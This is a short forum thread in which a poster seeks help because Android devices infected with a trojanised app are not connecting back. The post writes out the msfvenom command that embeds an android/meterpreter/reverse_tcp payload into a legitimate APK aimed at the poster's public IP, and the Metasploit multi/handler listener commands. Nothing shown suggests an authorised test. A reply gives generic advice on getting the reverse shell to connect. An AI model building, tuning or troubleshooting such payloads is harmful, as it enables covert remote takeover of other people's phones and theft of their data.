reverse tcp help - eyseys - Aug 1, 2023

would someone be able to mentor me? I am able to create payload and embed w/ msfvenom, I set up a listening instance, but infected devices are not connecting.

payload cli:$ msfvenom --platform android --arch dalvik -x yo.apk -p android/meterpreter/reverse_tcp lhost=x.x.x.x (public ip) lport=4545 -o payload.apk

msf listener: use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost x.x.x.x (same as payload)
set lport (same as above)
exploit

firewall is disabled
target = android

There are a few things that you should check if the infected devices are not connecting. First, make sure you are using the correct payload and the right listening port. You should also ensure that the payload is properly embedded and that the listener has permission to listen on the specified port. You should also verify that the correct targets are receiving the payload, and that the listener is set up on a network with no firewall, as this could be preventing the connection. Lastly, it is a good idea to test the listener using the reverse shell command to ensure that communications are working correctly.
